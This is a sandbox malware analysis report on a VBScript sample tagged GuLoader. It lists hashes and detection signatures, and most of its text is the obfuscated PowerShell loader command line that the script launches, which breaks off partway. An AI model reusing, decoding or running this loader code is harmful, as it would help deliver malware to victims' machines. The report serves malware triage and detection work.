Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TT_COPY.vbs

Overview

General Information

Sample Name:TT_COPY.vbs
Analysis ID:758166
MD5:a27bc40b7cf1e7e7e7a9b38221d4e849
SHA1:d24c19f3cf76f8f47fa6fffb12422f0fa0252b3b
SHA256:28a30c25fb101ed42b050c4b82777929b1cdd9fe02f8f386bb9708d3adb3b9bf
Tags:GuLoadervbs
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

VBScript performs obfuscated calls to suspicious functions
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Java / VBScript file with very long strings (likely obfuscated code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Contains functionality to detect virtual machines (SLDT)
Detected potential crypto function
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Abnormal high CPU Usage
Enables debug privileges

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5848 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 5636 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0Me Sp'RiEUn2NeCSt0SkDFa1MaEMa8ShCLiAFoCMa1TrDSi0FlCca9SoCGr0PhEDeDDeCBu4ClCAfBExCVa1BeCEn9UnCAn0By'Ga;Fl`$StFRdoRergasprkNonNoiNrnVagSmsFortiePrsCuuGulPitlyaDitUleLlrRusZa6bi=KlSComPuePlrRitNeeManDesAtbHvaMerPonBlsRe0Ha St'DrFUn7CoFFr1GeFPh6GlDSp5PrCTi0AdCje6EkCStCLiCTe4ExCTe9ViEVaBInCPr4UdCAm8EuCCu0Sp8fe9Sh8Pl5FaENeDFaCFrCPrCSp1WhCGa0InETr7maDSkCSuFMa6UdCKaCDuCPa2Ki8Te9Bi8Pl5NiFde5GyDRi0NoCSa7PsCMe9GaCCaCklCEn6Au'Ko;Ce`$meFAioAnrAnsOpkSmnPsiannUngPisAprTreFlsBluDelAftStaLatOveberStsBr7Sa=hySTamSteGrrFotRieOfnSesTobJuaLurSonPrsEp0St Kr'ViFVu7ChDEn0SkCKiBTrDFu1ceCHjCReCSu8TaCMo0tr8Je9Cr8Te5IrEdi8BiCDo4GeCCuBOpCMi4ReCBa2KuCId0SuCCa1Pe'gi;Fl`$StFHaoForSksFokAunUniUnnScgAfsSyrAfeDisSvuKalUntalaNatSoeAarGrsSa8Bl=BeSShmpreEerTytOreKanOvsOnbPaaKnrSknFisKi0Fo Kh'LiFSw7SuCQu0BlCOg3meCSp9DrCUd0MeCRe6CrDHa1LeCKo0VeCOv1FaEIm1SiCSk0UnCAn9BeCko0AuCln2DeCAc4boDbe1PiCSu0Da'No;Fi`$KeFLaoPerBasInkScnSpiKinDigPrsSbrIreWhsSruhilBetHaaMatKaebirZasSp9He=TeSJumVseDurSetSveKongasNebAsatwrBuninsDe0Su Be'ZyESlCBrCPlBUnESl8StCAf0KaCOu8JuCFoAMaDRe7LiDBeCudELa8OpCYdALyCEk1leDMa0PrCSn9luCAf0Gr'He;Ba`$CoGPrhSpeSpgCaiResSehMe0Re=opSSomAgeSgrCotVeeAdnCosNobDoaOmrfunPhsSi0Kl Re'MeEFo8HiDMoCSaECo1DeCSh0PrCFo9DoCun0BeCUo2PoCta4FoDXe1PrCMi0InFRo1BaDViCHaDMa5SvCSu0br'bo;Lo`$ErGTahUseTagFliTisUnhPl1In=FeSSumGrePrrRitAeeCunGrsDebOvaSkrTinHesAf0Da Mi'xmEfo6TaCUn9SyCTo4LsDde6GrDUn6No8Ko9At8Os5NoFRa5OmDAn0OrCUn7StCUn9ByCRuCLiCIs6Sk8Em9Ru8No5SiFLb6opCAl0HuCCa4PiCEn9MaCPi0JuCOv1Un8Ef9Ca8Ga5ReEDr4BaCFoBShDVa6AlCquCKvEOs6AmCUp9HeCOv4ApDSa6CaDOb6Pa8Wa9Lu8Ps5LoEVa4DyDPi0ReDDi1MiCKoAStECo6UlCMa9HjCMu4OxDIm6UnDSn6Pa'Mu;Ob`$AnGRehenespgSeiansFahFe2co=AcSGymMiemurretWoeAlnYnsSebanaSlrTrnFosst0br Re'SkEFuCMoCPrBStDTe3BgCHyAOxCMoESyCBj0Bi'Ni;Da`$SuGSnhnoeFigNaisisPahDr3St=DaSJomGleBorpitDyeVanDusBibHeaSprGrndusRu0Sp Us'SeFal5BeDEr0RuCKo7CaCOp9OpCFaCReCEt6Ko8In9Re8Ry5RiEhaDPlCArCBeCGa1haCAs0BaELu7IoDBaCBoFPa6LaCInCCaCKl2Th8Ko9Op8He5InEHoBTaCMi0AfDVi2BaFSk6ReCFo9AnCDaASpDKi1Va8Ar9Al8Bi5SlFpr3VoCSlCFaDre7CuDRe1muDTa0HeCLe4OlCVo9Wr'Be;Im`$BoGTehCheSlgKeiKvsDohSl4Dy=LoSTomNjeInrBotNoeStnSvsDibPeaPlrTinOvsPi0He Ne'PrFNo3IlCEvCKlDFo7UnDRe1HeDBe0EtCPr4inCMi9FjECo4HvCOr9OmCOn9coCAnANaCBa6Ge'Kn;So`$StGChhHaeSpgMfiBrsochDi5St=DrSSpmHaeharPstdoeArnNosPibfoaCarConBusIn0Mi at'EnCCiBDiDKa1SwCHe1SkCan9UrCCo9Fo'Fl;Ga`$IdGMihDeelagTiiUdsHyhLe6Ca=FoSfomQueMarGotGreJvnPrsHjbTnaDerDinFosAs0Sp An'SvEGgBSaDDu1BiFNo5ZyDRi7JoCAnABiDSp1UsCMu0FiCSe6giDpo1ReFEg3SuCFoCKvDPe7InDRe1CoDDe0InCRa4BoCNa9UnEAp8DaCSh0smCBl8LoCGaASyDKa7AvDNiCDi'Br;Kn`$MaGSohLoeDigThifosPohSe7Br=MiSBomDiePlrSptClePenGasWobPaaPtrSlnUnsRe0Ld Mu'udETiCFaECo0DiFBeDUn'Fe;Ap`$LeGKrhMieurgGoiMasTuhHe8Op=KoSBemRaeMirfrtRheOhnClsMubLaaOmrFinvasRe0Ro Vi'grFFr9Tr'Cu;MefDiuNonAacCltyoiYooNonTv ShfSnkGypto Ho{UnPPoaGurMoaHomHy Un(My`$RyUOppAfgGarfooTewEknAc,Va Fi`$ApDafeLapSprMyeFesLosthiRioEknHjsUnpimeSerBuiStoWhdmaePrrbi)Im La Ma vi Re Kr;En`$InHUnoRoeGtrFieFrsKo0Na uf=TeSSpmGoeAdrTktmieFrntosbebFeaRirVenansLa0Bi Un'Fe8Jv1SwEChEunDPo7DeCRe8WhCSm8CeCSy0UnDEx7OmCMe0SaCKaBSu8Sy5Ud9Vi8To8in5Pa8anDFlFReEGuEAf4IcDLa5knDpo5RaECo1prCViAEnCFi8CiCAr4ViCWoCDyCSeBVaFAr8st9VaFZo9UdFCaESc6FlDKl0coDUn7KeDFl7CoChy0BrCUbBPaDBo1UnEve1DiCBiAAfCFl8SaCMa4vaChaCFaCSyBHe8EbBJuEAt2UoCPi0AeDNe1unELa4InDKa6MiDIs6FlCAu0UdCPo8NoCTi7AlCHi9UnCTeCUnCTr0FuDMy6In8liDDa8opCTe8Tr5SeDPr9Er8Bu5VrFDi2ArCLaDFuCBu0MeDPl7snCDe0Br8Ph8PaEReARrCSe7TaCflFSiCRe0UnCBl6UsDTy1Ma8Ho5GeDdrEFo8Bi5Pu8Te1AnFKoAGr8PeBFoEwo2ReCSp9TiCBeAAlCOp7EnCSe4PrCSv9SkELi4deDLo6NeDSu6OrCSv0EkCFo8faCDo7UnCOu9OpDHeCCoEIl6MuCBa4DeCNe6ClCToDCoCCe0Di8Ne5Im8Ne8AdEOp4LiCCaBLaCIc1Ko8Ku5Br8kl1moFShATr8KuBTaEWa9unCSvADaCBe6ThCKo4CoDFr1SiCOiCStCBeAJeCTaBAl8SyBwiFBu6MaDSt5PlCIs9RtCHyCTuDWh1Sp8svDPa8Co1CiEBe2LiCReDDeCNe0MoCFe2TyCBlCMeDPe6TrCRvDPo9NrDSu8StCLiFKoEde8Ko8Ac9Ta4RuFIn8Ma8fiBRyEPr0ToDSk4LiDme0ReCRe4PaCBa9AdDSk6Ka8ErDSp8Un1SeEPr3EyCcrAAvDFa7SpDUn6AeCCoEUnCKoBPrCReCReCOvBFoCBi2SuDTr6PaDTe7CoChu0LoDco6AaDVa0NoCEn9BaDSu1MeCSt4PaDMo1ChCBr0OpDJo7KuDCo6Gn9Ma5No8NeCTr8De5AnDTe8Dy8StCFa8PrBSeESn2CaCVi0EvDVe1KrFPo1InDPaCSuDHa5BiCSt0Su8AnDTa8Om1SkETy3KnCCoADiDBo7OpDBa6PaCDaEbuCBiBTrCPeCInCOtBOpCVa2UdDEf6ReDCo7BaCte0GaDSo6KoDOm0LeCRd9FoDDe1CoCSm4GaDDe1IrCOi0NyDLi7ElDFa6Li9Ov4Cl8AnCFl'Kr;Li&Bi(Ud`$BeGPlhFeeFogReiInsRehMe7Cu)Ep No`$TuHVaoBreSirDaeAmsSv0Un;Un`$IsHRuoFieFnrPrevisDi5Un Lv=St SlSStmHaeBarSmtCheSinShsBubchaBorHenPlsSp0Mu Se'Be8St1caEsu6BoCBeDViCudCPsCDi9FaCMe9En8Us5Un9Pe8So8Li5Pe8Ua1FoEUnEChDNd7OkCSv8SuCAm8RyCFr0UnDDi7SoCLa0PrCAtBTr8DoBSuESy2OuCSn0CoDFl1NrEKe8SpCBa0PrDIn1MaCTeDSeCSuAScCSa1Me8GaDTh8Es1FrEEm3YoCBiADaDbo7RuDPy6OsCBeEOpCSaBTrCEqCTjCBaBLnCHj2TrDDi6tuDPa7UrCEg0HeDEp6HaDKu0BaCPe9PrDUn1DiCTa4SuDMy1ReCKe0MaDTe7GjDIr6Di9Co7Bl8Fi9Bi8Di5ShFBiEspFKo1StDSlCCoDLa5UpCTr0spFEnEWeFUn8bgFSp8Pu8En5joEDi5De8RuDSk8La1SoEin3BoCklAToDCh7DyDDe6CeCOlEToCWiBPrCTjCYuCRuBStCFr2UnDKr6SrDNo7EnCHv0FeDJu6LeDDi0FoCBi9DeDRe1StCIm4HaDBl1GuCch0VeDDy7ToDPr6Ar9Pr6Ta8be9de8Su5Re8Pn1PaEMe3NaCApATeDCa7OxDRe6GoCAnEMiCMoBCaCNoCUfCSpBovCAn2spDNe6ByDCh7GlCMe0SuDSy6FlDRe0KwCno9OvDDe1FoCRe4noDBr1AlCUn0HiDRe7LoDor6Ru9Ek1Un8TwCIn8ViCEy'Ri;Or&no(Li`$HeGSkhJoefigFriGussthMa7Io)Ve Ty`$TyHReoDieCarLieSisAt5Li;An`$LeHAsoCeeForDeeAfsSi1Ud Pe=Da UnSChmSeeRurFetFieNenBesVibKoaagrvinOvsEx0La Hj'UnDFr7meCBe0SuDFi1SeDRe0FoDAn7TaCTrBIs8br5Pe8Di1AfERa6StCAfDDaCFoCTrCMa9UnCSp9Fl8PoBBuEwaCLoCHuBtrDVe3OuCGuAKvCMeEGrCUd0Sl8FoDOm8Hj1SlCTeBbyDIl0TjCKo9SaCAr9Vi8Un9Fo8Ad5EvETr5St8SiDunFToETvFfr6HoDRiCNaDRh6SeDno1AvCBl0UrCSp8in8TaBReFNe7FoDCr0DeCRoBTaDBe1BoCShCSqCOs8BeCSo0Po8RaBImEOvCAfCFoBReDMa1gaCRy0KoDCe7PeCMyAMeDSv5SpFRu6TaCNi0OdDAs7PlDRe3prCAmCRaCTa6SyCAn0ByDDi6Sj8noBReENeDUnCAa4UaCPiBHeCHa1DiCPa9CaCPa0GaFAn7SaCUd0PaCDe3HaFSt8Ex8ElDBiENoBShCnu0ItDBy2Co8Ac8SvEHoACyCfr7feCstFTeCEn0SwCGe6ViDBu1Di8Ti5ThFTe6HeDDiCIvDPl6AcDKs1CrCSu0EcCQu8Fo8gnBLaFCh7PrDGa0BoCNoBNeDKb1PrCDoCLaCpr8QuCbr0Je8NaBFoEWoCInCFaBReDha1emCMo0PaDMe7TuCShAKrDLa5OmFAl6SpCNe0ChDBe7BeDRe3MeCFiCIrCBr6CoCCo0ThDUn6Re8SkBUnEnuDOmCCo4AlCNaBOmCRe1WiCid9LoCMo0BoFSy7NoCCa0unCSt3Av8SiDde8EdDUtEKaBEsCKa0UnDav2Hu8Su8udEBoAJuCBu7VaCUlFOvCPe0EnCUn6KiDTr1Al8Ra5MoEDaCGyCSaBTaDBd1HjFKu5UnDHo1SkDKa7Au8FoCVe8Sp9Ua8Ir5In8PiDKo8Lo1UnEorEpeDMo7HaCKr8AfCTa8NoCPo0IrDes7LaCDr0RaCDeBSk8AtBShESc2ArCOp0BrDam1AbEKb8MaCFo0HeDLe1saCplDPlCPrABaCKa1Ho8BuDAf8Dy1CaEKa3SpCSnAekDel7SuDDi6AnCTeESaCBuBUnCErCSaCTrBEuCPa2InDPl6EnDOk7ToCSu0ObDRa6alDAf0PrCVe9ItDSn1ByCKo4clDAb1PeCAp0HeDMa7UrDdi6Af9Sp0Ra8TeCFi8UgCse8InBMeEAbCMoCHnBUnDRe3UnCSvATeCReEMeCBl0Re8BoDHe8Fa1StCtrBbeDDo0BeCUn9KiCMi9Fa8De9In8Sn5BeESt5Ea8OvDHa8Br1udFSp0HeDGa5GuCIs2LeDSi7DjCPoAsiDHe2OsCRiBUn8SaCEl8ouCRe8AnCSp8TrCDo8Ka9Hj8Jo5In8Pr1TyESm1MiCop0ViDAs5afDGr7ExCPl0AuDAc6PhDPr6CoCfoCKlCTuAUnCSnBcoDTh6ToDBe5UnCUn0PuDBr7ClCUnCFuCDeAArCMa1SeCTi0VaDTi7Fr8spCFr8MeCpe'Af;El&Ag(Ov`$BeGLahOpeChgHuiSksPrhFo7El)Se Eu`$UnHNaoEmeNurLyePasIa1Bu;Pa}DefTouRenDacAmtMaiKaoBanJe SkGDiDHaTNe aa{KaPslaJurGtaFamHa Co(Ej[SaPOpaBarSiaBemCaeThtSteoprHy(BrPUnoAnsFyiSetafiMeokinOr Kl=Sk Re0Ph,Fi FaMImaRenMidCaaCatFooKrrdkyHa Mi=Sp Su`$PeTBerZauEmeUd)Mu]Oo Sq[BeTPlybapUdeAg[Ko]Me]Av ti`$SkNTroBenFodSmeVecSuoHarAmoPruRusFrlBeyHj,fu[EwPflamarUnaTomFaeSptImeamrAu(SkPChoTosphiUjtPriRaoDinCa Si=Tr Ga1Bs)La]Ta Dd[DrTExyGipFeeEm]Me Na`$ReCunoNoeIblIniKooComFoyNoaAulgrguniDoaSk Ma=Hy Is[PrVBloCrigldNo]Bu)Au;Ma`$AnHMioSeecarPreKasKo2ex Im=Va JgSNomNoeTorDatboeAnnUnsUnbakalyrTunfrsKl0af Lo'Ne8ku1MeEFoDchCac4diDSaCBeCNoBBlCBa0PrDZa6Fo8Br5Se9Bo8Fa8Un5LdFPrESiEFa4AnDmi5HeDWe5WaEHo1PrCReAOpCYa8HeCIn4ReCBoCPeCEmBFrFSt8An9CoFUn9SpFSlESt6neDOl0AuDfl7InDOa7JeCSk0FaCUnBCoDTo1GrEsp1SnCLaATiCSo8DaCNa4EmCUnCStCcyBCy8RaBStEFl1ReCSe0PhCRa3PiCSyCStCKoBVaCSa0AuEJe1AiDEmCThCSnBVaCJu4BeCEx8ReCSoCPlCCi6BoEVa4HaDFe6KoDFa6UnCit0KeCTi8HaCWi7GrCUd9GrDDoCMo8VaDCa8rgDToEHaBLaCSu0DeDSt2Ln8ne8PhECrAPeCja7PhCsvFChCSt0ChCBa6AuDMa1He8Sh5UdFLo6SoDSaCtyDLa6PhDSy1TrCKo0HaCSp8Gu8InBSeFPe7CrCKk0DiCEm3siCSo9ReCEg0DeCSa6maDBl1VaCCaCBuCObAKrCUnBBr8CiBLtEDr4FiDIc6TsDIn6RuCCa0SkCSy8UrCGe7WoCWe9BrDCeCStEBlBAmCCo4BoCUd8WiCSk0Ch8UdDTi8Hy1OsEUn3FlCFlALyDBe7KrDsk6baCOvECaCPrBOvCUdCAnCReBUnCSr2SuDBa6CaDCo7ZoCBr0GaDDe6yoDRe0BaCUl9YaDFi1DeCBe4ReDAr1AlCAn0OrDUv7UnDsl6Kl9HuDMe8FuCCy8KaCBr8na9Pr8Hv5FaFBeESaFar6EyDGiCFrDHa6LaDmu1ReCfe0ruCUd8Ko8FaBKaFme7UnCUn0AfCAn3GlCKo9KoCMa0GoCRa6CuDSl1InCSuCHyCUnAcoCFjBEs8BrBPoEKo0vaCFl8MiCOpCSkDGr1Me8SoBMiETh4AlDTo6CaDco6maCwa0hyCpo8phCos7ChCFe9GrDCaCInEAt7foDPa0PrCNoCSkCKa9ArCTj1TyCSu0DiDCr7DiESh4UpCBe6UnCTe6StCSy0adDHa6SkDSu6NoFBe8po9InFBe9SnFBaFEl7ReDbr0LeCMiBPi8UdCDo8ReBNoEUm1StCAp0peCAm3AmCMyCpaCTyBAnCLa0FoEIl1DeDStCOpCSlBNeCWa4StCKo8VoCsnCbuCUn6OkEEn8FuCOrAOrCLi1nuDSr0DiCBi9PaCOp0Su8CoDDa8Ta1ReEKu3MyCheASmDTr7MuDAr6SaCSpEPiCErBStCdaCStCSkBMaCIm2ArDAd6SeDSp7MaCKr0UnDFy6EcDGo0PoCSu9ElDEn1GlCSn4TuDAb1DiCMi0foDOv7MeDIs6Ma9MeCBu8Pr9In8Uo5St8Ly1KaCDe3WaCMu4CeCDr9BaDso6UnCSe0qu8DeCOt8EmBKeEAt1HoCFa0HeCKa3krCBuCBaCSeBHoCAu0DoFVr1MoDOvCLoDDi5OvCMe0Pr8SeDKa8Pr1OdEBl2SoCatDBrCCu0InCTi2foCDeCUnDUn6UbCLyDMi9Di5Sm8Pe9St8Gr5Su8En1DaEEo2FiCBrDVaCga0miCCh2BrCAdCkeDMe6OuCPhDCo9Wi4Ud8Fo9In8Un5AnFSpESkFTy6InDfaCFrDTr6AsDGa1PeCIn0AbCTe8Te8IsBAmEFe8PuDOu0JaCOp9BeDBi1vaCPrCNeCAs6NoCYe4puDGe6PoDdk1ErEma1NeCOv0BuCDe9hjCKo0EnCHj2GaCJe4LuDBr1crCAf0AsFSv8Sa8InCMg'Tr;An&Vi(vu`$paGEqhsoeTugAdiTrsNohPr7Ad)sm Hu`$BoHCooBoePrrCaeSvsSy2La;Pr`$AtHDroLaeAlrUneKasSp3Re Ru=Ps LnSKomSaeTirMytHjeKonEasFobOxaRirBlnTasTa0Gu Pe'Ti8Ar1CoEStDBeCst4ReDgeCLaCOsBExCUn0RkDMo6De8DyBGiEDo1SeCan0DiCUn3TrCurCAuCOvBSyCGn0SiEda6DaCMiAMoCUnBUnDQu6UnDBe1IsDBr7GaDTu0noCha6HvDBr1ReCTaABoDAx7St8GhDRi8Me1MaEWa3SuCSyASaDTy7KoDMu6BoCSkESyCFoBScCFaCIcCPaBToCin2CaDCh6KlDAn7MaCFo0VaDCl6koDMu0UdCel9AlDUn1ReCAd4BaDLu1GuCBr0FrDMi7KoDUn6Re9To3Op8hv9St8Fo5DmFKlESaFBr6FoDUnCHyDCy6RaDpe1HoCro0SpCPr8St8DrBBoFGa7haCTo0MuCMi3MoCbr9CaCSo0SeCWe6GrDAn1MoCWiCShCEnATiCEsBOo8ElBTiERi6ErCPr4BeCAs9AnCDi9MaCBiCLoCFoBStCIc2UnEDe6SyCOvAAnCStBSpDkl3DrCSt0RiCTeBPaDIs1ReCDeCScCsaAKvCSpBIlDHe6GyFps8pl9AdFCa9geFAcFEg6SvDLe1HeCLo4VaCUnBYaCLe1FrCCy4MeDSe7InCPl1Ba8Di9Of8Pe5Sc8El1PhEKaBAvCLiABuCefBOfCSo1udCGl0FrCta6BeCSpABeDLi7alCSpASuDSt0HoDFa6BlCCo9TiDSuCPo8JaCKo8AaBTaFCr6SmCDo0DrDLi1GrEgrCBlCSp8PiDBe5VeCMi9SuCMe0elCGr8beCSt0NoCOxBSqDKv1CaCSe4VrDco1JiCLeCdrCSwASuCSeBFeEMo3RuCCo9InCLu4SoCKr2KaDTi6Sh8StDCh8Sa1NoESk3BuCChAaeDHe7IvDSk6FaCSaEReCRoBruCLoCnoCCuBKrCSp2PaDCo6SoDSa7IdCre0EjDka6AxDUn0SeCSu9CaDBe1JoCNa4HeDRu1NoCge0SpDIn7TeDno6Bo9Sp2Lo8ThCVr'In;Fr&No(Cl`$MiGorhtweStgTeiBysFahta7Ph)Ha Be`$coHNooIseRerGreDusPa3Se;Uf`$AfHHuoSceUnrSaeResMo4Su Ma=Re PhSSpmBaeFarTrtaeeScnInsInbIaaThrAnnResUn0Ev An'As8Tr1MaEYnDOpCGo4HeDUdCSpCGaBraCMa0HaDBy6En8VaBPoEBo1miCMa0SkCLa3PhCKuCDrCVeBKoCPu0StEOm8MbCFo0SaDHo1CoCMeDKoCAdAUnCSw1Fo8EfDGr8St1KlEUd2MuCHaDDeCpo0NiCFo2AfCStCViDGr6TeCSmDEr9Br7Co8Al9Ro8ch5De8di1AdEUn2SoCUrDEuCPo0BlCpi2CiCLnCTiDre6BrCAmDNe9Mi6Be8Bi9Es8Kl5In8An1DoEBe6MiCInAShCPa0MeCBr9BeCSiCBaCSmAAfCmj8KoDPrCSlCTa4ViCUd9BrCCe2weCPaCGrCBr4Dr8Sk9Tr8Un5Ch8re1PrECuBGdCHeABeCSmBMiCde1GrCSt0ZoCNe6PuCBnASkDFe7GrCHyATvDFo0InDNo6anCCy9EjDRiCFl8ToCTo8RiBAmFMe6FoCGa0VoDTa1DyEPoCanCCo8BeDBr5LyCBo9SvCPu0SyCTa8MiCCa0KoCStBKlDGr1LuCAs4ReDNo1CiCNsCLaCStAOrCunBEgEGi3ReCFi9TrCBe4unCFr2MaDOb6Ex8CiDSc8Ha1NoEUn3enCBrASlDMr7klDUr6BaCHaEMaCBiBLaCTaCMiCKoBDoCHa2PrDSl6KrDLe7GtCCo0ApDSy6FoDKv0RyCBi9DiDFr1RaCTu4PuDFr1TaCFo0ApDSu7GoDWe6Pr9In2Mo8BuCIr'Sn;Ma&Se(Fy`$OuGdrhOpeStgVeielsTuhNo7De)Hy Ph`$EfHPeoDieOvrbueHysSh4Gr;Ej`$JuHAnoBaeGrrkoeGasTa5Ca Ba=Lu UlSfrmBreHorAftTieWrnLisPlbBuaMerShnTrsKv0Ko li'OvDPe7InCrg0OuDDi1AlDTr0ApDRe7AnCAfBIn8Sl5St8Vi1PrEExDskCHa4OpDHiCLyCStBNeCSa0SaDSt6Rg8DoBDiEFo6ViDMo7DyCBo0PhChj4YaDTa1ubCSk0KnFUd1BeDhjCDuDLi5StCSj0Ov8LeDDe8KrCHa'Rg;st&An(Ko`$StGafhBoeOpgOpiFosBrhKa7Re)Sp ol`$OpHWaoPeeZarMueFisPr5Co Se Kn Fa;Le}Fo`$faURenLocFrobruObpAilHaeEn Aa=Ko FrSMomobeAbrDitBreManMasDebfoaAbrInnFesKh0Ke Ve'ReCGsEEmCte0MuDun7YoCArBUnCPa0TeCGo9ar9Ar6ra9Af7di'De;Gr`$PrHUnoYoeEfrAdeKosPl6Sy Gr=Du MaSplmgeeBirSptUneFrnPosFobSoaDirDynAfsJu0gr Tv'Au8Na1EtFBr2LaCFl0koDTr7DuCCa0UnDSk7CaCPl4brDFi1Br8Ba5eu9Ut8Dr8Gu5fiFMaEdaFFi6ToDBeCVeDWo6ChDme1VoCUn0ShCAi8Sl8UnBAnFMb7InDDv0DdCTiBEnDPu1LnCMeCGaCdi8VoCKo0Ek8saBStEinCauCGeBGaDNo1ImCPh0BoDBa7PtCOsAChDSp5SkFMa6BrCTi0SkDFl7FiDFl3WiCUdCTrCSp6DeCRe0TaDKe6Ma8s 